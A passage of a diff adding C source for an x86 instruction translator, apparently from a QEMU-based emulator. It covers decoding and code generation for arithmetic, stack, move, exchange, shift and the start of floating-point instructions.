+ if (op == 2 || op == 4) { + /* operand size for jumps is 64 bit */ + ot = MO_64; + } else if (op == 3 || op == 5) { + ot = dflag != MO_16 ? 
MO_32 + (rex_w == 1) : MO_16; + } else if (op == 6) { + /* default push size is 64 bit */ + ot = mo_pushpop(s, dflag); + } + } + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + if (op >= 2 && op != 3 && op != 5) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + + switch(op) { + case 0: /* inc Ev */ + if (mod != 3) + opreg = OR_TMP0; + else + opreg = rm; + gen_inc(s, ot, opreg, 1); + break; + case 1: /* dec Ev */ + if (mod != 3) + opreg = OR_TMP0; + else + opreg = rm; + gen_inc(s, ot, opreg, -1); + break; + case 2: /* call Ev */ + /* XXX: optimize if memory (no 'and' is necessary) */ + if (dflag == MO_16) { + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + next_eip = s->pc - s->cs_base; + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], next_eip); + gen_push_v(s, *cpu_T[1]); + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 3: /* lcall Ev */ + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + do_lcall: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lcall_protected(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + } else { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lcall_real(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); + } + gen_eob(s); + break; + case 4: /* jmp Ev */ + if (dflag == MO_16) { + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 5: /* ljmp Ev */ + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + do_ljmp: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + 
tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_ljmp_protected(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + } else { + gen_op_movl_seg_T0_vm(tcg_ctx, R_CS); + gen_op_jmp_v(tcg_ctx, *cpu_T[1]); + } + gen_eob(s); + break; + case 6: /* push Ev */ + gen_push_v(s, *cpu_T[0]); + break; + default: + goto illegal_op; + } + break; + + case 0x84: /* test Ev, Gv */ + case 0x85: + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0xa8: /* test eAX, Iv */ + case 0xa9: + ot = mo_b_d(b, dflag); + val = insn_get(env, s, ot); + + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], OR_EAX); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0x98: /* CWDE/CBW */ + switch (dflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_EAX, *cpu_T[0]); + break; +#endif + case MO_32: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EAX); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_EAX, *cpu_T[0]); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[0], R_EAX); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + break; + default: + tcg_abort(); + } + break; + case 0x99: /* CDQ/CWD */ + switch (dflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], R_EAX); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 63); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_EDX, *cpu_T[0]); + break; +#endif + case MO_32: + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + 
tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 31); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_EDX, *cpu_T[0]); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EAX); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 15); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + break; + default: + tcg_abort(); + } + break; + case 0x1af: /* imul Gv, Ev */ + case 0x69: /* imul Gv, Ev, I */ + case 0x6b: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + if (b == 0x69) + s->rip_offset = insn_const_size(ot); + else if (b == 0x6b) + s->rip_offset = 1; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + if (b == 0x69) { + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + } else if (b == 0x6b) { + val = (int8_t)insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + } + switch (ot) { +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_muls2_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[1], *cpu_T[0], *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[reg]); + tcg_gen_sari_tl(tcg_ctx, cpu_cc_src, cpu_cc_dst, 63); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_T[1]); + break; +#endif + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + tcg_gen_muls2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + tcg_gen_sari_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 31); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[reg]); + tcg_gen_sub_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, cpu_cc_src, cpu_tmp2_i32); + break; + default: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* 
XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + } + set_cc_op(s, CC_OP_MULB + ot); + break; + case 0x1c0: + case 0x1c1: /* xadd Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_ADDB + ot); + break; + case 0x1b0: + case 0x1b1: /* cmpxchg Ev, Gv */ + { + int label1, label2; + TCGv t0, t1, t2, a0; + + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + t2 = tcg_temp_local_new(tcg_ctx); + a0 = tcg_temp_local_new(tcg_ctx); + gen_op_mov_v_reg(tcg_ctx, ot, t1, reg); + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, ot, t0, rm); + } else { + gen_lea_modrm(env, s, modrm); + tcg_gen_mov_tl(tcg_ctx, a0, cpu_A0); + gen_op_ld_v(s, ot, t0, a0); + rm = 0; /* avoid warning */ + } + label1 = gen_new_label(tcg_ctx); + tcg_gen_mov_tl(tcg_ctx, t2, *cpu_regs[R_EAX]); + gen_extu(tcg_ctx, ot, t0); + gen_extu(tcg_ctx, ot, t2); + 
tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t2, t0, label1); + label2 = gen_new_label(tcg_ctx); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, t0); + tcg_gen_br(tcg_ctx, label2); + gen_set_label(tcg_ctx, label1); + gen_op_mov_reg_v(tcg_ctx, ot, rm, t1); + } else { + /* perform no-op store cycle like physical cpu; must be + before changing accumulator to ensure idempotency if + the store faults and the instruction is restarted */ + gen_op_st_v(s, ot, t0, a0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, t0); + tcg_gen_br(tcg_ctx, label2); + gen_set_label(tcg_ctx, label1); + gen_op_st_v(s, ot, t1, a0); + } + gen_set_label(tcg_ctx, label2); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, t0); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, t2); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_dst, t2, t0); + set_cc_op(s, CC_OP_SUBB + ot); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, a0); + } + break; + case 0x1c7: /* cmpxchg8b */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if ((mod == 3) || ((modrm & 0x38) != 0x8)) + goto illegal_op; +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + if (!(s->cpuid_ext_features & CPUID_EXT_CX16)) + goto illegal_op; + gen_jmp_im(s, pc_start - s->cs_base); + gen_update_cc_op(s); + gen_lea_modrm(env, s, modrm); + gen_helper_cmpxchg16b(tcg_ctx, cpu_env, cpu_A0); + } else +#endif + { + if (!(s->cpuid_features & CPUID_CX8)) + goto illegal_op; + gen_jmp_im(s, pc_start - s->cs_base); + gen_update_cc_op(s); + gen_lea_modrm(env, s, modrm); + gen_helper_cmpxchg8b(tcg_ctx, cpu_env, cpu_A0); + } + set_cc_op(s, CC_OP_EFLAGS); + break; + + /**************************/ + /* push/pop */ + case 0x50: case 0x51: case 0x52: case 0x53: + case 0x54: case 0x55: case 0x56: case 0x57: //case 0x50 ... 
0x57: /* push */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], (b & 7) | REX_B(s)); + gen_push_v(s, *cpu_T[0]); + break; + case 0x58: case 0x59: case 0x5a: case 0x5b: + case 0x5c: case 0x5d: case 0x5e: case 0x5f: //case 0x58 ... 0x5f: /* pop */ + ot = gen_pop_T0(s); + /* NOTE: order is important for pop %sp */ + gen_pop_update(s, ot); + gen_op_mov_reg_v(tcg_ctx, ot, (b & 7) | REX_B(s), *cpu_T[0]); + break; + case 0x60: /* pusha */ + if (CODE64(s)) + goto illegal_op; + gen_pusha(s); + break; + case 0x61: /* popa */ + if (CODE64(s)) + goto illegal_op; + gen_popa(s); + break; + case 0x68: /* push Iv */ + case 0x6a: + ot = mo_pushpop(s, dflag); + if (b == 0x68) + val = insn_get(env, s, ot); + else + val = (int8_t)insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_push_v(s, *cpu_T[0]); + break; + case 0x8f: /* pop Ev */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + ot = gen_pop_T0(s); + if (mod == 3) { + /* NOTE: order is important for pop %sp */ + gen_pop_update(s, ot); + rm = (modrm & 7) | REX_B(s); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + /* NOTE: order is important too for MMU exceptions */ + s->popl_esp_hack = 1 << ot; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + s->popl_esp_hack = 0; + gen_pop_update(s, ot); + } + break; + case 0xc8: /* enter */ + { + int level; + val = cpu_lduw_code(env, s->pc); + s->pc += 2; + level = cpu_ldub_code(env, s->pc++); + gen_enter(s, val, level); + } + break; + case 0xc9: /* leave */ + /* XXX: exception not precise (ESP is updated before potential exception) */ + if (CODE64(s)) { + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_ESP, *cpu_T[0]); + } else if (s->ss32) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_ESP, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_ESP, *cpu_T[0]); + } + ot = gen_pop_T0(s); + 
gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[0]); + gen_pop_update(s, ot); + break; + case 0x06: /* push es */ + case 0x0e: /* push cs */ + case 0x16: /* push ss */ + case 0x1e: /* push ds */ + if (CODE64(s)) + goto illegal_op; + gen_op_movl_T0_seg(tcg_ctx, b >> 3); + gen_push_v(s, *cpu_T[0]); + break; + case 0x1a0: /* push fs */ + case 0x1a8: /* push gs */ + gen_op_movl_T0_seg(tcg_ctx, (b >> 3) & 7); + gen_push_v(s, *cpu_T[0]); + break; + case 0x07: /* pop es */ + case 0x17: /* pop ss */ + case 0x1f: /* pop ds */ + if (CODE64(s)) + goto illegal_op; + reg = b >> 3; + ot = gen_pop_T0(s); + gen_movl_seg_T0(s, reg, pc_start - s->cs_base); + gen_pop_update(s, ot); + if (reg == R_SS) { + /* if reg == SS, inhibit interrupts/trace. */ + /* If several instructions disable interrupts, only the + _first_ does it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + s->tf = 0; + } + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x1a1: /* pop fs */ + case 0x1a9: /* pop gs */ + ot = gen_pop_T0(s); + gen_movl_seg_T0(s, (b >> 3) & 7, pc_start - s->cs_base); + gen_pop_update(s, ot); + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + + /**************************/ + /* mov */ + case 0x88: + case 0x89: /* mov Gv, Ev */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + /* generate a generic store */ + gen_ldst_modrm(env, s, modrm, ot, reg, 1); + break; + case 0xc6: + case 0xc7: /* mov Ev, Iv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + reg = ((modrm >> 3) & 7) | rex_r; + if (mod != 3) { + if (reg != 0) + goto illegal_op; + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + } else { + if (reg != 0 && reg != 7) + goto illegal_op; + } + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + if (mod != 3) { + gen_op_st_v(s, ot, 
*cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, (modrm & 7) | REX_B(s), *cpu_T[0]); + } + break; + case 0x8a: + case 0x8b: /* mov Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0x8e: /* mov seg, Gv */ + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + if (reg >= 6 || reg == R_CS) + goto illegal_op; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_movl_seg_T0(s, reg, pc_start - s->cs_base); + if (reg == R_SS) { + /* if reg == SS, inhibit interrupts/trace */ + /* If several instructions disable interrupts, only the + _first_ does it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + s->tf = 0; + } + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x8c: /* mov Gv, seg */ + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + if (reg >= 6) + goto illegal_op; + gen_op_movl_T0_seg(tcg_ctx, reg); + ot = mod == 3 ? dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + + case 0x1b6: /* movzbS Gv, Eb */ + case 0x1b7: /* movzwS Gv, Eb */ + case 0x1be: /* movsbS Gv, Eb */ + case 0x1bf: /* movswS Gv, Eb */ + { + TCGMemOp d_ot; + TCGMemOp s_ot; + + /* d_ot is the size of destination */ + d_ot = dflag; + /* ot is the size of source */ + ot = (b & 1) + MO_8; + /* s_ot is the sign+size of source */ + s_ot = b & 8 ? 
MO_SIGN | ot : ot; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + switch (s_ot) { + case MO_UB: + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + case MO_SB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + case MO_UW: + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + default: + case MO_SW: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + } + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, s_ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } + } + break; + + case 0x8d: /* lea */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + reg = ((modrm >> 3) & 7) | rex_r; + /* we must ensure that no segment is added */ + s->override = -1; + val = s->addseg; + s->addseg = 0; + gen_lea_modrm(env, s, modrm); + s->addseg = val; + gen_op_mov_reg_v(tcg_ctx, ot, reg, cpu_A0); + break; + + case 0xa0: /* mov EAX, Ov */ + case 0xa1: + case 0xa2: /* mov Ov, EAX */ + case 0xa3: + { + target_ulong offset_addr; + + ot = mo_b_d(b, dflag); + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + offset_addr = cpu_ldq_code(env, s->pc); + s->pc += 8; + break; +#endif + default: + offset_addr = insn_get(env, s, s->aflag); + break; + } + tcg_gen_movi_tl(tcg_ctx, cpu_A0, offset_addr); + gen_add_A0_ds_seg(s); + if ((b & 2) == 0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], R_EAX); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } + } + break; + case 0xd7: /* xlat */ + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX]); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, *cpu_T[0]); + 
gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + gen_op_ld_v(s, MO_8, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_EAX, *cpu_T[0]); + break; + case 0xb0: case 0xb1: case 0xb2: case 0xb3: + case 0xb4: case 0xb5: case 0xb6: case 0xb7: //case 0xb0 ... 0xb7: /* mov R, Ib */ + val = insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_op_mov_reg_v(tcg_ctx, MO_8, (b & 7) | REX_B(s), *cpu_T[0]); + break; + case 0xb8: case 0xb9: case 0xba: case 0xbb: + case 0xbc: case 0xbd: case 0xbe: case 0xbf: //case 0xb8 ... 0xbf: /* mov R, Iv */ +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + uint64_t tmp; + /* 64 bit case */ + tmp = cpu_ldq_code(env, s->pc); + s->pc += 8; + reg = (b & 7) | REX_B(s); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], tmp); + gen_op_mov_reg_v(tcg_ctx, MO_64, reg, *cpu_T[0]); + } else +#endif + { + ot = dflag; + val = insn_get(env, s, ot); + reg = (b & 7) | REX_B(s); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + break; + + case 0x91: case 0x92: case 0x93: + case 0x94: case 0x95: case 0x96: case 0x97: //case 0x91 ... 
0x97: /* xchg R, EAX */ + do_xchg_reg_eax: + ot = dflag; + reg = (b & 7) | REX_B(s); + rm = R_EAX; + goto do_xchg_reg; + case 0x86: + case 0x87: /* xchg Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + do_xchg_reg: + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + /* for xchg, lock is implicit */ + if (!(prefixes & PREFIX_LOCK)) + gen_helper_lock(tcg_ctx, cpu_env); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (!(prefixes & PREFIX_LOCK)) + gen_helper_unlock(tcg_ctx, cpu_env); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } + break; + case 0xc4: /* les Gv */ + /* In CODE64 this is VEX3; see above. */ + op = R_ES; + goto do_lxx; + case 0xc5: /* lds Gv */ + /* In CODE64 this is VEX2; see above. */ + op = R_DS; + goto do_lxx; + case 0x1b2: /* lss Gv */ + op = R_SS; + goto do_lxx; + case 0x1b4: /* lfs Gv */ + op = R_FS; + goto do_lxx; + case 0x1b5: /* lgs Gv */ + op = R_GS; + do_lxx: + ot = dflag != MO_16 ? 
MO_32 : MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + /* load the segment first to handle exceptions properly */ + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + gen_movl_seg_T0(s, op, pc_start - s->cs_base); + /* then put the data */ + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + + /************************/ + /* shifts */ + case 0xc0: + case 0xc1: + /* shift Ev,Ib */ + shift = 2; + grp2_label: + { + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + + if (mod != 3) { + if (shift == 2) { + s->rip_offset = 1; + } + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = (modrm & 7) | REX_B(s); + } + + /* simpler op */ + if (shift == 0) { + gen_shift(s, op, ot, opreg, OR_ECX); + } else { + if (shift == 2) { + shift = cpu_ldub_code(env, s->pc++); + } + gen_shifti(s, op, ot, opreg, shift); + } + } + break; + case 0xd0: + case 0xd1: + /* shift Ev,1 */ + shift = 1; + goto grp2_label; + case 0xd2: + case 0xd3: + /* shift Ev,cl */ + shift = 0; + goto grp2_label; + + case 0x1a4: /* shld imm */ + op = 0; + shift = 1; + goto do_shiftd; + case 0x1a5: /* shld cl */ + op = 0; + shift = 0; + goto do_shiftd; + case 0x1ac: /* shrd imm */ + op = 1; + shift = 1; + goto do_shiftd; + case 0x1ad: /* shrd cl */ + op = 1; + shift = 0; + do_shiftd: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = rm; + } + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + + if (shift) { + TCGv imm = tcg_const_tl(tcg_ctx, cpu_ldub_code(env, s->pc++)); + 
gen_shiftd_rm_T1(s, ot, opreg, op, imm); + tcg_temp_free(tcg_ctx, imm); + } else { + gen_shiftd_rm_T1(s, ot, opreg, op, *cpu_regs[R_ECX]); + } + break; + + /************************/ + /* floats */ + case 0xd8: case 0xd9: case 0xda: case 0xdb: + case 0xdc: case 0xdd: case 0xde: case 0xdf: //case 0xd8 ... 0xdf: + if (s->flags & (HF_EM_MASK | HF_TS_MASK)) { + /* if CR0.EM or CR0.TS are set, generate an FPU exception */ + /* XXX: what to do if illegal op ? */ + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = modrm & 7; + op = ((b & 7) << 3) | ((modrm >> 3) & 7); + if (mod != 3) { + /* memory op */ + gen_lea_modrm(env, s, modrm); + + if( (op >= 0x00 && op <= 0x07) || /* fxxxs */ + (op >= 0x10 && op <= 0x17) || /* fixxxl */ + (op >= 0x20 && op <= 0x27) || /* fxxxl */ + (op >= 0x30 && op <= 0x37) ) /* fixxx */ + { + int op1; + op1 = op & 7; + + switch(op >> 4) { + case 0: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_flds_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 1: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_fildl_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 2: + 